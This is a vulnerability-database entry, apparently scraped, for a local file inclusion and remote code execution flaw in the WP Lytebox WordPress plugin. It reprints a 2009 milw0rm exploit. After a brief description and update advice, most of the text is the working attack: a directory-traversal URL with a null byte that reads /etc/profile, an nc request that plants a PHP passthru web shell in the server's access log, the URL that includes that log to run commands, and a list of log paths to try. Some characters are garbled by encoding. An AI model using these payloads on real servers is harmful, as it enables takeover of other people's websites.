WP Plugin Lytebox Local File Include and Remote Code Execution

vendor:

WP Plugin Lytebox

by:

TurkGuvenligi

9,3

CVSS

HIGH

Local File Include and Remote Code Execution

CWE

Product Name: WP Plugin Lytebox

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

WP Plugin Lytebox Local File Include and Remote Code Execution

WP Plugin Lytebox is vulnerable to Local File Include and Remote Code Execution. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server. This will allow the attacker to read sensitive files from the server and execute arbitrary code on the server.

Mitigation:

Update the WP Plugin Lytebox to the latest version to mitigate this vulnerability.

Source

Exploit-DB raw data:

WP Plugin Lytebox Local File Ä°nclude and Remote Code Exe.

Download ; http://grupenet.com/wp-content/uploads/wp-lytebox.zip

Author : TurkGuvenligi

Site : www.turkguvenligi.info - admin@turkguvenligi.info

Agd_Scorp - t4cs1zkr4L - TheHacker - Fatih - BLaSTeR

LFÄ°;

http://localhost/wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../../etc/profile%00

RCE;

open cmd (cmd aÃ§Ä±yoruz)

nc -vv 127.0.0.1 80 (connecting)
GET /<?php passthru(\$_GET[cmd]); ?> HTTP/1.0
Host : www.target.com

Our error is recorded and access_log :) yeah

http://localhost/wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../../var/log/apache2/access_log&cmd=[RCE]

access_log file ;


../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../etc/httpd/logs/access_log
../../../../../../../../../../etc/httpd/logs/access.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/apache2/error_log
../../../../../../../../../../var/log/apache2/error.log
../../../../../../../../../../var/log/apache2/access_log
../../../../../../../../../../var/log/apache2/access.log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/error_log
../../../../../../../../../../var/log/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/access.log

good by. [www.turkguvenligi.info]

# milw0rm.com [2009-05-26]